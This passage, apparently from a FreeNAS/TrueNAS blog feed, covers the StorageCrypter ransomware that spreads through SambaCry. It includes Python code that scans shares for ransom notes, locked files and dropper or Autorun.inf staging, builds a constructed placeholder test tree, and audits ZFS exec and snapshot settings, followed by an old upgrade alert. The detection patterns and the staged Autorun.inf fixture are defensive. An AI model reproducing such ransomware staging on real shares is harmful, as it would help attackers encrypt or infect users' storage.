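                with open(full, encoding="utf-8", errors="replace") as fh:
                    targets = AUTORUN_TARGET.findall(fh.read())
                # Record what the autorun file would launch on a Windows client.
                hits["autorun"].append(f"{rel} -> {', '.join(targets) or '?'}")
    return {kind: sorted(paths) for kind, paths in hits.items()}


def assess(hits):
    """Classify a share: 'encrypted', 'dropper-staged' or 'clean'."""
    if hits["ransom_note"] or hits["locked_file"]:
        return "encrypted"
    if hits["dropper"] or hits["autorun"]:
        return "dropper-staged"
    return "clean"


def build_constructed_share(root):
    """Create a small constructed sample tree (harmless placeholder files only)."""
    files = {
        "docs/report.odt.locked": "",
        "docs/" + RANSOM_NOTE: "constructed note",
        "Autorun.inf": "[autorun]\nopen=" + DROPPER_NAME + "\n",
        DROPPER_NAME: "",
        "photos/cat.jpg": "",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
```

A “dropper-staged” result means the share holds the client-side executable or an Autorun.inf but no renamed files yet, which is the point at which rolling back to a snapshot costs the least.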

What does this mean for FreeNAS users?
FreeNAS systems later than 9.10.2-U4 are not vulnerable to SambaCry. In addition, unlike the commodity NAS systems described above, FreeNAS:

  • Does not run GNU/Linux, significantly reducing its attack surface
  • Does not have any default SMB sharing paths, slowing an attack
  • Could mitigate the ransomware aspect of the attack with OpenZFS snapshots
  • Should, as with any NAS, never be exposed to the Internet in the first place

Just as with any ransomware attack that directly targets network shares, OpenZFS snapshots in FreeNAS and TrueNAS are a proven means of quickly recovering from the damage done by the attack and avoiding payment of a ransom. Unfortunately, the StorageCrypter attack marks a shift from ransomware relying on users falling for attractive phishing bait to automated attacks that exploit software vulnerabilities. Attackers have not yet set their sights on OpenZFS snapshots when launching ransomware attacks but you should start protecting yourself in case they do:

  • Never expose your FreeNAS or TrueNAS storage system to the open Internet like the 350,000 Samba users who are at this very moment!
  • If you need to grant remote access to your system for administrative reasons such as remote replication, do so using a combination of a GeoIP-aware firewall and a Virtual Private Network
  • Set the “exec=off” OpenZFS property on your shares to prevent malware execution
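The last recommendation, together with the snapshot advice, can be audited from the output of the `zfs` command. This is an added example, not code from the original article or from iXsystems; the pool and dataset names are constructed, and the function names are assumptions.

```python
import subprocess

# Constructed sample of `zfs get -H -t filesystem -o name,value,source exec`
# (tab-separated because of -H).
SAMPLE_EXEC = (
    "tank\ton\tdefault\n"
    "tank/shares\toff\tlocal\n"
    "tank/shares/media\toff\tinherited from tank/shares\n"
    "tank/shares/scratch\ton\tlocal\n"
)
# Constructed sample of `zfs list -H -t snapshot -o name`.
SAMPLE_SNAPS = "tank/shares@auto-2017-12-25\ntank/shares/media@auto-2017-12-25\n"


def parse_exec(text):
    """Map dataset name -> (exec value, property source)."""
    props = {}
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) == 3:
            props[fields[0]] = (fields[1], fields[2])
    return props


def audit(exec_text, snap_text, share_root):
    """Return share datasets that allow execution or have no snapshot."""
    snapped = {line.split("@", 1)[0] for line in snap_text.splitlines() if "@" in line}
    findings = {"exec_on": [], "no_snapshot": []}
    for name, (value, _source) in sorted(parse_exec(exec_text).items()):
        if name != share_root and not name.startswith(share_root + "/"):
            continue  # only datasets under the share root are in scope
        if value != "off":
            findings["exec_on"].append(name)
        if name not in snapped:
            findings["no_snapshot"].append(name)
    return findings


def zfs(*args):
    """Run the real zfs CLI on a host that has it (not used by the sample)."""
    return subprocess.run(["zfs", *args], check=True,
                          capture_output=True, text=True).stdout

# On a live system (assumed share root "tank/shares"):
#   audit(zfs("get", "-H", "-t", "filesystem", "-o", "name,value,source", "exec"),
#         zfs("list", "-H", "-t", "snapshot", "-o", "name"), "tank/shares")
```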

The FreeNAS engineering team is watching this situation closely and is always looking for opportunities to further secure FreeNAS and TrueNAS. Watch the “Why we Love ZFS & You Should Too” and “Defeating Ransomware with TrueNAS” webinars to find out more about OpenZFS and how to use OpenZFS snapshots to protect yourself from attacks like StorageCrypter.
Michael Dexter
Senior Analyst

Security Alert: All users need to upgrade to the latest release (0.7.2.5543) https://www.truenas.com/blog/security-alert-all-users-need-to-upgrade-to-the-latest-release-0-7-2-5543/ Sun, 07 Nov 2010 08:19:00 +0000

All users need to upgrade their FreeNAS to the latest stable release (0.7.2.5543).
If you can’t upgrade: Restrict WebGUI access to trusted IP addresses.
Thanks to Brian Adeloye from Tenable Network Security for reporting this vulnerability.
